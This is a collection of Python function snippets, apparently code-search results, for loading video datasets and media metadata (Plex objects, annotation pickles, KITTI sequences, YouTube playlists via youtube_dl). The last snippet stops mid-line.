"def _loadData(self, data):\n Video._loadData(self, data)\n Playable._loadData(self, data)\n self._data = data\n self.addedAt = utils.toDatetime(data.attrib.get('addedAt'))\n self.duration = utils.cast(int, data.attrib.get('duration'))\n self.extraType = utils.cast(int, data.attrib.get('extraType'))\n self.index = utils.cast(int, data.attrib.get('index'))\n self.media = self.findItems(data, media.Media)\n self.originallyAvailableAt = utils.toDatetime(\n data.attrib.get('originallyAvailableAt'), '%Y-%m-%d')\n self.skipDetails = utils.cast(int, data.attrib.get('skipDetails'))\n self.subtype = data.attrib.get('subtype')\n self.thumbAspectRatio = data.attrib.get('thumbAspectRatio')\n self.viewOffset = utils.cast(int, data.attrib.get('viewOffset', 0))\n self.year = utils.cast(int, data.attrib.get('year'))", "def parse():\n all_players = list(FACE_IMAGE_LOCATIONS.keys())\n face_encodings = VideoParser.__load_faces_encodings(all_players)\n player_occurrences = VideoParser.__get_player_occurrences(all_players, face_encodings)\n VideoParser.__save_parsed_video(player_occurrences)", "def load(self) -> None:\n self._load_data()\n self._load_poses()\n self._load_timestamps()", "def loadData(catalog):\n loadVideos(catalog)\n loadCategories(catalog)", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n frame_dir = video_info['filename']\n video_info['filename'] = osp.join(self.data_prefix, video_info['filename'])\n video_info['frame_dir'] = frame_dir\n video_info['index'] = i\n \n video_info['text'] = [video_info['text']] \n video_infos.append(video_info) \n del ann_info\n\n return video_infos", "def _loadData(self, data):\n Video._loadData(self, data)\n Playable._loadData(self, data)\n self.audienceRating = utils.cast(float, data.attrib.get('audienceRating'))\n self.audienceRatingImage = data.attrib.get('audienceRatingImage')\n self.chapters = self.findItems(data, media.Chapter)\n self.chapterSource = data.attrib.get('chapterSource')\n self.collections = self.findItems(data, media.Collection)\n self.contentRating = data.attrib.get('contentRating')\n self.countries = self.findItems(data, media.Country)\n self.directors = self.findItems(data, media.Director)\n self.duration = utils.cast(int, data.attrib.get('duration'))\n self.editionTitle = data.attrib.get('editionTitle')\n self.enableCreditsMarkerGeneration = utils.cast(int, data.attrib.get('enableCreditsMarkerGeneration', '-1'))\n self.genres = self.findItems(data, media.Genre)\n self.guids = self.findItems(data, media.Guid)\n self.labels = self.findItems(data, media.Label)\n self.languageOverride = data.attrib.get('languageOverride')\n self.markers = self.findItems(data, media.Marker)\n self.media = self.findItems(data, media.Media)\n self.originallyAvailableAt = utils.toDatetime(data.attrib.get('originallyAvailableAt'), '%Y-%m-%d')\n self.originalTitle = data.attrib.get('originalTitle')\n self.primaryExtraKey = data.attrib.get('primaryExtraKey')\n self.producers = self.findItems(data, media.Producer)\n self.rating = utils.cast(float, data.attrib.get('rating'))\n self.ratingImage = data.attrib.get('ratingImage')\n self.ratings = self.findItems(data, media.Rating)\n self.roles = self.findItems(data, media.Role)\n self.similar = self.findItems(data, media.Similar)\n self.studio = data.attrib.get('studio')\n self.tagline = data.attrib.get('tagline')\n self.theme = data.attrib.get('theme')\n self.useOriginalTitle = utils.cast(int, 
data.attrib.get('useOriginalTitle', '-1'))\n self.viewOffset = utils.cast(int, data.attrib.get('viewOffset', 0))\n self.writers = self.findItems(data, media.Writer)\n self.year = utils.cast(int, data.attrib.get('year'))", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n filename = osp.join(self.data_prefix, video_info['filename']) \n video_info['filename'] = filename\n frame_dir = video_info['filename']\n video_info['frame_dir'] = frame_dir \n video_info['index'] = i\n video_info['label'] = -1 \n video_info['text'] = [video_info['text']] \n video_infos.append(video_info) \n del ann_info\n return video_infos", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n filename = osp.join(self.data_prefix, video_info['filename']) \n video_info['filename'] = filename\n frame_dir = video_info['filename']\n video_info['frame_dir'] = frame_dir \n video_info['index'] = i\n video_info['label'] = -1 \n video_info['text'] = [video_info['text']] \n video_infos.append(video_info) \n del ann_info\n return video_infos", "def merge_video_data(self):\n if self.overwrite:\n if self.wipe:\n self.videos = self.youtube_videos\n elif self.add_new_files or self.overwrite_fields:\n old_videos = {\n video.filename: video\n for video in self.file_videos\n }\n old_videos_url = {\n video.metadata['videos'][0]['url']: video\n for video in self.file_videos\n }\n new_videos = {}\n for video in self.youtube_videos:\n new_video_url = video.metadata['videos'][0]['url']\n if new_video_url in old_videos_url:\n new_video_filename = old_videos_url[new_video_url].filename\n else:\n new_video_filename = video.filename\n new_videos[new_video_filename] = video\n\n if self.overwrite_fields:\n forgotten = set(old_videos) - set(new_videos)\n for name in forgotten:\n logger.warning('Missing video: {} {}',\n old_videos[name].filename,\n old_videos[name].metadata['videos'][0]['url'],\n )\n\n changes = set(new_videos).intersection(set(old_videos))\n for path in changes:\n merged_video = old_videos[path].merge(\n new_videos[path], self.overwrite_fields)\n self.videos.append(merged_video)\n else:\n self.videos = self.file_videos\n if self.add_new_files:\n adds = set(new_videos) - set(old_videos)\n self.videos.extend([new_videos[path] for path in adds])\n else: # not self.overwrite\n self.videos = self.youtube_videos", "def _loadData(self, data):\n Video._loadData(self, data)\n self.audienceRating = utils.cast(float, data.attrib.get('audienceRating'))\n self.audienceRatingImage = data.attrib.get('audienceRatingImage')\n self.audioLanguage = data.attrib.get('audioLanguage', '')\n self.autoDeletionItemPolicyUnwatchedLibrary = utils.cast(\n int, data.attrib.get('autoDeletionItemPolicyUnwatchedLibrary', '0'))\n self.autoDeletionItemPolicyWatchedLibrary = utils.cast(\n int, data.attrib.get('autoDeletionItemPolicyWatchedLibrary', '0'))\n self.childCount = utils.cast(int, data.attrib.get('childCount'))\n self.collections = self.findItems(data, media.Collection)\n self.contentRating = data.attrib.get('contentRating')\n self.duration = utils.cast(int, data.attrib.get('duration'))\n self.enableCreditsMarkerGeneration = utils.cast(int, data.attrib.get('enableCreditsMarkerGeneration', '-1'))\n self.episodeSort = utils.cast(int, data.attrib.get('episodeSort', '-1'))\n self.flattenSeasons = utils.cast(int, 
data.attrib.get('flattenSeasons', '-1'))\n self.genres = self.findItems(data, media.Genre)\n self.guids = self.findItems(data, media.Guid)\n self.index = utils.cast(int, data.attrib.get('index'))\n self.key = self.key.replace('/children', '') # FIX_BUG_50\n self.labels = self.findItems(data, media.Label)\n self.languageOverride = data.attrib.get('languageOverride')\n self.leafCount = utils.cast(int, data.attrib.get('leafCount'))\n self.locations = self.listAttrs(data, 'path', etag='Location')\n self.network = data.attrib.get('network')\n self.originallyAvailableAt = utils.toDatetime(data.attrib.get('originallyAvailableAt'), '%Y-%m-%d')\n self.originalTitle = data.attrib.get('originalTitle')\n self.rating = utils.cast(float, data.attrib.get('rating'))\n self.ratings = self.findItems(data, media.Rating)\n self.roles = self.findItems(data, media.Role)\n self.seasonCount = utils.cast(int, data.attrib.get('seasonCount', self.childCount))\n self.showOrdering = data.attrib.get('showOrdering')\n self.similar = self.findItems(data, media.Similar)\n self.studio = data.attrib.get('studio')\n self.subtitleLanguage = data.attrib.get('audioLanguage', '')\n self.subtitleMode = utils.cast(int, data.attrib.get('subtitleMode', '-1'))\n self.tagline = data.attrib.get('tagline')\n self.theme = data.attrib.get('theme')\n self.useOriginalTitle = utils.cast(int, data.attrib.get('useOriginalTitle', '-1'))\n self.viewedLeafCount = utils.cast(int, data.attrib.get('viewedLeafCount'))\n self.year = utils.cast(int, data.attrib.get('year'))", "def videos(self, videos):\n self._videos = videos", "def _loadData(self, data):\n Video._loadData(self, data)\n Playable._loadData(self, data)\n self._seasonNumber = None # cached season number\n self.audienceRating = utils.cast(float, data.attrib.get('audienceRating'))\n self.audienceRatingImage = data.attrib.get('audienceRatingImage')\n self.chapters = self.findItems(data, media.Chapter)\n self.chapterSource = data.attrib.get('chapterSource')\n self.collections = self.findItems(data, media.Collection)\n self.contentRating = data.attrib.get('contentRating')\n self.directors = self.findItems(data, media.Director)\n self.duration = utils.cast(int, data.attrib.get('duration'))\n self.grandparentArt = data.attrib.get('grandparentArt')\n self.grandparentGuid = data.attrib.get('grandparentGuid')\n self.grandparentKey = data.attrib.get('grandparentKey')\n self.grandparentRatingKey = utils.cast(int, data.attrib.get('grandparentRatingKey'))\n self.grandparentTheme = data.attrib.get('grandparentTheme')\n self.grandparentThumb = data.attrib.get('grandparentThumb')\n self.grandparentTitle = data.attrib.get('grandparentTitle')\n self.guids = self.findItems(data, media.Guid)\n self.index = utils.cast(int, data.attrib.get('index'))\n self.labels = self.findItems(data, media.Label)\n self.markers = self.findItems(data, media.Marker)\n self.media = self.findItems(data, media.Media)\n self.originallyAvailableAt = utils.toDatetime(data.attrib.get('originallyAvailableAt'), '%Y-%m-%d')\n self.parentGuid = data.attrib.get('parentGuid')\n self.parentIndex = utils.cast(int, data.attrib.get('parentIndex'))\n self.parentKey = data.attrib.get('parentKey')\n self.parentRatingKey = utils.cast(int, data.attrib.get('parentRatingKey'))\n self.parentThumb = data.attrib.get('parentThumb')\n self.parentTitle = data.attrib.get('parentTitle')\n self.parentYear = utils.cast(int, data.attrib.get('parentYear'))\n self.producers = self.findItems(data, media.Producer)\n self.rating = utils.cast(float, 
data.attrib.get('rating'))\n self.ratings = self.findItems(data, media.Rating)\n self.roles = self.findItems(data, media.Role)\n self.skipParent = utils.cast(bool, data.attrib.get('skipParent', '0'))\n self.viewOffset = utils.cast(int, data.attrib.get('viewOffset', 0))\n self.writers = self.findItems(data, media.Writer)\n self.year = utils.cast(int, data.attrib.get('year'))\n\n # If seasons are hidden, parentKey and parentRatingKey are missing from the XML response.\n # https://forums.plex.tv/t/parentratingkey-not-in-episode-xml-when-seasons-are-hidden/300553\n if self.skipParent and data.attrib.get('parentRatingKey') is None:\n # Parse the parentRatingKey from the parentThumb\n if self.parentThumb and self.parentThumb.startswith('/library/metadata/'):\n self.parentRatingKey = utils.cast(int, self.parentThumb.split('/')[3])\n # Get the parentRatingKey from the season's ratingKey\n if not self.parentRatingKey and self.grandparentRatingKey:\n self.parentRatingKey = self.show().season(season=self.parentIndex).ratingKey\n if self.parentRatingKey:\n self.parentKey = f'/library/metadata/{self.parentRatingKey}'", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n data = hload_pkl(self.ann_file)\n\n video_infos = []\n for video_info in data:\n filename = video_info['filename']\n if self.data_prefix is not None:\n filename = osp.join(self.data_prefix, filename)\n video_info['filename'] = filename\n label = video_info['label']\n if self.multi_class and isinstance(label, np.ndarray):\n video_info['label'] = label.astype(np.float32)\n\n video_infos.append(video_info)\n\n while len(video_infos) < self.min_video_num:\n left_num = min(self.min_video_num - len(video_infos), len(video_infos))\n video_infos.extend(random.sample(video_infos, left_num))\n return video_infos", "def _loadData(self, data):\n Video._loadData(self, data)\n self.audioLanguage = data.attrib.get('audioLanguage', '')\n self.collections = self.findItems(data, media.Collection)\n self.guids = self.findItems(data, media.Guid)\n self.index = utils.cast(int, data.attrib.get('index'))\n self.key = self.key.replace('/children', '') # FIX_BUG_50\n self.labels = self.findItems(data, media.Label)\n self.leafCount = utils.cast(int, data.attrib.get('leafCount'))\n self.parentGuid = data.attrib.get('parentGuid')\n self.parentIndex = utils.cast(int, data.attrib.get('parentIndex'))\n self.parentKey = data.attrib.get('parentKey')\n self.parentRatingKey = utils.cast(int, data.attrib.get('parentRatingKey'))\n self.parentStudio = data.attrib.get('parentStudio')\n self.parentTheme = data.attrib.get('parentTheme')\n self.parentThumb = data.attrib.get('parentThumb')\n self.parentTitle = data.attrib.get('parentTitle')\n self.ratings = self.findItems(data, media.Rating)\n self.subtitleLanguage = data.attrib.get('audioLanguage', '')\n self.subtitleMode = utils.cast(int, data.attrib.get('subtitleMode', '-1'))\n self.viewedLeafCount = utils.cast(int, data.attrib.get('viewedLeafCount'))\n self.year = utils.cast(int, data.attrib.get('year'))", "def load_poses(self):\n print('Loading poses for sequence ' + self.sequence + '...')\n\n pose_file = os.path.join(self.pose_path, self.sequence + '.txt')\n\n # Read and parse the poses\n try:\n self.T_w_cam0 = []\n with open(pose_file, 'r') as f:\n for line in f.readlines():\n T = np.fromstring(line, dtype=float, sep=' ')\n T = T.reshape(3, 4)\n T = np.vstack((T, [0, 0, 0, 1]))\n self.T_w_cam0.append(T)\n print('done.')\n\n except FileNotFoundError:\n print('Ground truth poses are not avaialble for 
sequence ' +\n self.sequence + '.')", "def loadData(catalog, size):\n loadCategories(catalog)\n loadVideos(catalog, size)", "def load(self):\n if self.content_provider:\n self.content_provider.load()\n self.items = self.content_provider.movies", "def get_session_videodata(videos):\n # Get first frame of first video for future processing and number of frames in each video\n videos_data = {'Frame rate': [], 'Number frames': []}\n for idx, videofile in enumerate(videos):\n cap = cv2.VideoCapture(videofile)\n videos_data['Frame rate'].append(cap.get(cv2.CAP_PROP_FPS))\n videos_data['Number frames'].append(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)))\n videos_data['Cumu. Num Frames'] = np.cumsum(videos_data['Number frames'])\n return videos_data", "def videos(self) -> List[AbstractVideoLoader]:\n return self._videos", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n filename = osp.join(self.data_prefix, video_info['filename']+'.avi') \n video_info['filename'] = filename\n frame_dir = video_info['filename']\n video_info['frame_dir'] = frame_dir \n video_info['index'] = i\n video_info['label'] = -1 if 'answer_idx' not in video_info else video_info['answer_idx']\n\n if isinstance(video_info['text'], str):\n video_info['text'] = [video_info['text']] \n else:\n if not self.test_ret:\n video_info['text'] = [rnd.choice(video_info['text'])]\n else:\n video_info['clip_text_candidate'] = list(range(len(video_info['text'])))\n\n video_infos.append(video_info) \n del ann_info\n\n return video_infos", "def load_data():\n # use the load_snippet_pths_test in data writer to get frames and labels\n print('Loading frames and labels...')\n dataset_writer = dataset_factory.get_writer(FLAGS.datasetname)\n writer = dataset_writer()\n\n # retrieve list of test videos\n vid_lst = writer.generate_data_lst_from_split(FLAGS.split_fn)\n if _DEBUG_:\n vid_lst = vid_lst[:3]\n\n # for each video, collect fnames and labels with downsampling\n frames, labels = [], []\n print('Found {:d} videos'.format(len(vid_lst)))\n for vid in vid_lst:\n print(' Loading {}...'.format(vid))\n fname_pths_per_vid, labels_per_vid = writer.load_snippet_pths_test(\n FLAGS.datadir, [vid], FLAGS.labels_fname, FLAGS.bg_lbl,\n FLAGS.ext, FLAGS.frameskip)\n fname_pths_per_vid = [x[0] for x in fname_pths_per_vid]\n\n if _DEBUG_:\n fname_pths_per_vid = fname_pths_per_vid[:200]\n labels_per_vid = labels_per_vid[:200]\n\n frames.append(_load_images(fname_pths_per_vid))\n labels.append(np.array(labels_per_vid))\n return frames, labels", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n info_dict = {} \n info_dict['filename'] = video_info['vid_name']\n frame_dir = info_dict['filename']\n info_dict['frame_dir'] = frame_dir\n info_dict['index'] = i\n info_dict['label'] = video_info['answer_idx']\n info_dict['answers'] = video_info['answers']\n info_dict['question'] = video_info['q']\n info_dict['subtitle'] = video_info['located_sub_text']\n info_dict['frame_ind'] = video_info['located_frame']\n info_dict['total_frames'] = video_info.get('total_frames', -1)\n video_infos.append(info_dict) \n del ann_info\n\n return video_infos", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n info_dict = {} \n 
info_dict['filename'] = video_info['vid_name'] if 'filename' not in video_info else video_info['filename']\n frame_dir = info_dict['filename']\n info_dict['frame_dir'] = frame_dir\n info_dict['index'] = i\n info_dict['label'] = video_info['answer_idx']\n info_dict['answers'] = video_info['answers'] if 'answers' in video_info else video_info['text']\n info_dict['question'] = video_info['question'] if 'question' in video_info else \"\"\n video_infos.append(info_dict) \n del ann_info\n\n return video_infos", "def onclick_load_video(self):\n video_source = select_file(\n \"Select Video Files\",\n \"../\",\n \"Video Files (*.mp4 *.avi *.mpg *.gif *.mov)\")\n if video_source:\n param_name = select_file(\n \"Select Parameter\", \"../\", \"Parameter Files (*.json)\")\n if param_name:\n self.moildev = Moildev(param_name)\n self.running_video(video_source)", "def load_video(self):\r\n if self.file_name=='':\r\n Tk().withdraw()\r\n self.file_name = askopenfilename()\r\n cap = cv2.VideoCapture(self.file_name)\r\n self.length = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\r\n self.width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\r\n self.heigth = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n self.fps = int(round(cap.get(cv2.CAP_PROP_FPS)))\r\n \r\n video_buffer = []#np.ndarray(shape=(self.length, self.heigth, self.width, 3), dtype=np.uint8)\r\n for i in tqdm(range(self.length), desc='Loading video from: {}'.format(self.file_name)):\r\n ret, frame = cap.read()\r\n if not ret:\r\n break\r\n video_buffer.append(frame)\r\n #assert(i==self.length-1)\r\n video_buffer = np.array(video_buffer, dtype=np.uint8)\r\n self.video_buffer = video_buffer\r\n cap.release()\r\n self.ix = self.width-1\r\n self.iy = self.heigth-1 \r\n self.roi = dict(x1=self.x, y1=self.y, x2=self.ix, y2=self.iy)\r\n return video_buffer", "def LOSO(self, epochs, debug=False):\n\n indices = [i for i in range(0, len(self.dataset))]\n\n if debug:\n print(f\"{len(indices)} number of videos before purge\")\n\n indices = self.filter_bad_indices(indices, debug=debug)\n\n if debug:\n print(f\"{len(indices)} remain after purge\")\n\n results = [[\"filename\", \"MIMIC\", \"INF\"]]\n old_dir = self.save_dir\n\n # Cycle through videos, performing LOSO\n for i in range(0, len(indices)):\n self.save_dir = old_dir + f\"LOSO_{self.dataset[indices[i]]['filename'][:-4]}_{self.segment}/\"\n\n if debug:\n print(f\"Working on model LOSO_model_{self.dataset[indices[i]]['filename'][:-4]}_{self.segment}\")\n\n self.net = model.Classifier(self.frame_seg, dropout=0.35, device=self.device)\n self.net = self.net.to(self.device)\n self.optim = optim.Adam(self.net.parameters(), lr=0.001, weight_decay=0.0001)\n indices_copy = indices.copy()\n self.train(epochs, train=indices_copy[:i] + indices_copy[i+1:], val=[indices[i]], debug=debug)\n\n results.append(self.test([indices[i]], debug)[0])\n\n utils.write_to_csv(old_dir + f\"LOSO_{self.segment}_RESULTS.csv\", results)", "def load_data(self):", "def load_velo(self):\n # Find all the Velodyne files\n velo_path = os.path.join(self.sequence_path, 'velodyne', '*.bin')\n velo_files = sorted(glob.glob(velo_path))\n\n # Subselect the chosen range of frames, if any\n if self.frame_range:\n velo_files = [velo_files[i] for i in self.frame_range]\n\n print('Found ' + str(len(velo_files)) + ' Velodyne scans...')\n\n # Read the Velodyne scans. 
Each point is [x,y,z,reflectance]\n self.velo = utils.load_velo_scans(velo_files)\n\n print('done.')", "def load_data(self) -> None:", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n if isinstance(video_info['text'], str):\n video_info['text'] = [video_info['text']]\n for text in video_info['text']:\n info = {}\n frame_dir = video_info['filename']\n filename = osp.join(self.data_prefix, video_info['filename']+'.mp4') \n info['filename'] = filename\n info['frame_dir'] = frame_dir\n info['index'] = i\n info['label'] = -1 if 'answer_idx' not in video_info else video_info['answer_idx']\n info['text'] = [text]\n if self.is_ret:\n pass\n elif self.is_mc:\n info['clip_text_candidate'] = [0, 1, 2, 3, 4]\n elif self.is_qa:\n pass\n video_infos.append(info) \n del ann_info\n\n return video_infos", "def __loadVideo(self):\n # Check if movie file exists ...\n #\n if not(os.path.isfile(self.fNameVideo)):\n return stm.StimErrC.videoFileNotFound\n\n try: \n # Load video\n #\n self.video = mpe.VideoFileClip(self.fNameVideo)\n \n except IOError: \n return stm.StimErrC.invalidVideoFormat\n \n # Retrieve video description\n #\n self.dxFr = self.video.size[0]\n self.dyFr = self.video.size[1]\n self.nFr = self.video.duration *self.video.fps\n self.fps = self.video.fps\n ssp.Log.write(\"DEBUG\", \"stim_video: {0}x{1} pixel, {2} frames, {3} fps\"\n .format(self.dxFr, self.dyFr, self.nFr, self.fps))\n \n if self.isTestOnly:\n # Return here if the video was only loaded to test if it is ok\n #\n self.video = None\n return stm.StimErrC.ok\n \n # Load movie frames (note that frames is a generator!)\n #\n self.frames = self.video.iter_frames() \n self.isReady = True\n return stm.StimErrC.ok", "def load_all(self):\n if os.path.isfile(self.vocab_path):\n self.vocab_processor = self.load_vocab()\n else:\n self.vocab_processor = self.train_vocab()\n if self.data_path:\n self.x, self.y = self.load_data(self.need_shuffle)\n print(\"Max document length: {}\".format(self.max_doc))", "def test_plenty_of_video_files():\n # make sure that there is one sequence per video file\n pipe = VideoPipe(\n batch_size=BATCH_SIZE, data=PLENTY_VIDEO_FILES, step=1000000, sequence_length=1)\n pipe.build()\n iters = math.ceil(len(os.listdir(PLENTY_VIDEO_DIRECTORY)) / BATCH_SIZE)\n for i in range(iters):\n print(\"Iter \" + str(i))\n pipe.run()", "def videos(self):\n return self._videos", "def load_video(self):\n self.video_file = tkFileDialog.askopenfilename()\n self.video_parser = VideoFileParser(self.video_file)\n\n self.video_entries = self.video_parser.entries\n\n for index, entry in enumerate(self.video_entries):\n self.video_box.insert(index, entry.word)", "def loadData():\n\tprint \"Loading POS vectorized reviews\"\n\twith open(DATA_PATH, \"rb\") as data_file:\n\t\tdata = cPickle.load(data_file)\n\treturn data", "def _loadData(self, data):\n Clip._loadData(self, data)\n PlexSession._loadData(self, data)", "def load_data(path='./data/train'):\n print(\"Loading IMDB Data...\")\n data = []\n\n dir = os.path.dirname(__file__)\n file_list = glob.glob(os.path.join(dir, path + '/pos/*'))\n file_list.extend(glob.glob(os.path.join(dir, path + '/neg/*')))\n print(\"Parsing %s files\" % len(file_list))\n for i, f in enumerate(file_list):\n with open(f, \"r\", encoding=\"utf8\") as openf:\n s = openf.read()\n data.append(imp.preprocess(s)) # NOTE: Preprocessing code called here on all reviews\n return data", "def 
get_all_videos(self):\n\n return list(self._videos.values())", "def load_expdict(params, e, expdict, _DEFAULT_VIDDIR):\n _DEFAULT_NPY_DIR = 'npy_volumes'\n exp = params.copy()\n exp = make_paths_safe(exp)\n exp[\"label3d_file\"] = expdict[\"label3d_file\"]\n exp[\"base_exp_folder\"] = os.path.dirname(exp[\"label3d_file\"])\n\n if \"viddir\" not in expdict:\n # if the videos are not at the _DEFAULT_VIDDIR, then it must\n # be specified in the io.yaml experiment portion\n exp[\"viddir\"] = os.path.join(exp[\"base_exp_folder\"], _DEFAULT_VIDDIR)\n else:\n exp[\"viddir\"] = expdict[\"viddir\"]\n print(\"Experiment {} using videos in {}\".format(e, exp[\"viddir\"]))\n\n l3d_camnames = io.load_camnames(expdict[\"label3d_file\"])\n if \"camnames\" in expdict:\n exp[\"camnames\"] = expdict[\"camnames\"]\n elif l3d_camnames is not None:\n exp[\"camnames\"] = l3d_camnames\n print(\"Experiment {} using camnames: {}\".format(e, exp[\"camnames\"]))\n\n # Use the camnames to find the chunks for each video\n chunks = {}\n for name in exp[\"camnames\"]:\n if exp[\"vid_dir_flag\"]:\n camdir = os.path.join(exp[\"viddir\"], name)\n else:\n camdir = os.path.join(exp[\"viddir\"], name)\n intermediate_folder = os.listdir(camdir)\n camdir = os.path.join(camdir, intermediate_folder[0])\n video_files = os.listdir(camdir)\n video_files = [f for f in video_files if \".mp4\" in f]\n video_files = sorted(video_files, key=lambda x: int(x.split(\".\")[0]))\n chunks[str(e) + \"_\" + name] = np.sort(\n [int(x.split(\".\")[0]) for x in video_files]\n )\n exp[\"chunks\"] = chunks\n print(chunks)\n\n # For npy volume training\n if params[\"use_npy\"]:\n exp[\"npy_vol_dir\"] = os.path.join(exp[\"base_exp_folder\"], _DEFAULT_NPY_DIR)\n return exp", "def refresh(self):\r\n # todo, use vid_info as property instead of this\r\n # reset properties and rebuild streams\r\n self.setup()", "def load_demos():\n for index in range(len(feconf.DEMO_EXPLORATIONS)):\n load_demo(str(index))", "def load_movies():\n filepath = \"./seed_data/u.item\"\n movies = open(filepath)\n\n for movie in movies:\n movie = movie.rstrip().split('|')\n title = movie[1][:-7]\n title = title.decode(\"latin-1\")\n if movie[2]:\n date = datetime.strptime(movie[2], '%d-%b-%Y')\n else:\n date = None\n db_movie = Movie(\n movie_id = movie[0], title = title, \n released_at = date, imdb_url = movie[4])\n db.session.add(db_movie)\n\n db.session.commit()", "def _loadData(self, data):\n Clip._loadData(self, data)\n PlexHistory._loadData(self, data)", "def get_movie_data(files: list) -> list:\n pass", "def precompute_numpy_video_files(self):\n videos = self.get_videos(self.not_collisions, 1) \\\n | chain_with(self.get_videos(self.collisions, 0)) \\\n | where(lambda f: not isfile(self.get_numpy_filename(f[1])))\n\n for v in videos:\n path = self.get_numpy_filename(v[1])\n\n video_to_npy(v[1],\n # note weird thing here, width doesn't work they appear to be inverted\n height=self.video_size,\n squarecrop=self.squarecrop,\n fps=self.framerate,\n maxlength=self.max_length,\n # save a npy replacement\n outfile=path)\n\n print('%s written' % (path))", "def download_video_data(self):\n\n def scrape_url(url):\n \"\"\"Scrape the video list, youtube_dl does all the heavy lifting\"\"\"\n ydl_opts = {\n \"ignoreerrors\": True, # Skip private and unavaliable videos\n }\n\n ydl = youtube_dl.YoutubeDL(ydl_opts)\n\n with ydl:\n result_ydl = ydl.extract_info(\n url,\n download=False # No download needed, only the info\n )\n\n logger.debug('Url scraped {}', url)\n if 'entries' in 
result_ydl:\n # It's a playlist or a list of videos\n return result_ydl['entries']\n # Just a video\n return [result_ydl]\n\n youtube_list = sum((scrape_url(url) for url in self.youtube_lists), [])\n for youtube_video_data in youtube_list:\n if youtube_video_data: # Valid video\n self.youtube_videos.append(\n Video.from_youtube(\n video_data=youtube_video_data, event=self))\n else:\n logger.warning('Null youtube video')", "def start(self):\n\n ydl_opts = {}\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n while True:\n videos = self.get_videos() # getting list of all videos from file\n print('{} videos to go'.format(len(videos))) # print no. of video remaining\n video = get_first_item(videos) # get next video for downloading\n if video is None: # check if video is there or not\n break\n\n ydl.download([video]) # downloading video\n videos.remove(video) # remove video from list\n self.save_file(videos) # save updated list to file\n\n print('All downloaded')", "def _parse_list(self):\n frame_path = [x.strip().split(' ') for x in open(self._image_set)] \n self.video_list = [VideoRecord(item) for item in frame_path]\n print('Sequence number/ video number:%d' % (len(self.video_list)))", "def _parse_list(self):\n frame_path = [x.strip().split(' ') for x in open(self._image_set)] \n self.video_list = [VideoRecord(item) for item in frame_path]\n print('Sequence number/ video number:%d' % (len(self.video_list)))", "def videos(self):\r\n return v3.Videos(self)", "def load_stream_data(test_path, test_file=0):\n left_video_file = os.path.join(test_path + '/left_{:02d}.avi'.format(test_file))\n right_video_file = os.path.join(test_path + '/right_{:02d}.avi'.format(test_file))\n left_annotations_dir = os.path.join(test_path + '/left_{:02d}_json/*'.format(test_file))\n right_annotations_dir = os.path.join(test_path + '/right_{:02d}_json/*'.format(test_file))\n\n left_annotations = sorted(glob(left_annotations_dir))\n right_annotations = sorted(glob(right_annotations_dir))\n\n return left_video_file, right_video_file, left_annotations, right_annotations", "def init_video(self):\n\n assert self.container is None\n\n retry = 3\n while self.container is None and 0 < retry:\n retry -= 1\n try:\n self.container = av.open(self.tello.get_video_stream())\n except av.AVError as ave:\n print(ave)\n print('retry...')\n\n\n assert self.container is not None", "def get_video_data(self):\n\t\tfeature_str = 'fdhh' if self.fdhh else 'pca'\n\t\tif self.options.mode == 'test':\n\t\t\tfeature_path = (f'{self.feature_folder}_FD', f'train_test_{feature_str}.pic')\n\t\telse:\n\t\t\tfeature_path = (f'{self.feature_folder}_FD', f'train_dev_{feature_str}.pic')\n\t\t\t\n\t\t# Return saved features if exist:\n\t\tif not self.options.save_features and os.path.exists(f'{feature_path[0]}/{feature_path[1]}'):\n\t\t\tX_train, X_test = load_from_file(f'{feature_path[0]}/{feature_path[1]}')\n\t\telse:\n\t\t\tX_train, X_test = self.get_train_test()\n\t\t\t'''X_train, X_test = scale(X_train, X_test, scale_type='standard', axis=0, use_boxcox=True, boxcox_axis=0,\n\t\t\t use_pandas=True, verbose=self.options.verbose)'''\n\t\t\tX_train, X_test = scale(X_train, X_test, scale_type='minmax', axis=0, use_pandas=True,\n\t\t\t verbose=self.options.verbose)\n\t\t\tif self.fdhh:\n\t\t\t\tif self.options.verbose:\n\t\t\t\t\tprint('Performing FDHH over train and test set...')\n\t\t\t\tX_train = X_train.groupby(level=0).apply(self.FDHH)\n\t\t\t\tX_test = X_test.groupby(level=0).apply(self.FDHH)\n\t\t\t\tif self.options.verbose:\n\t\t\t\t\tprint(f'Sparsity 
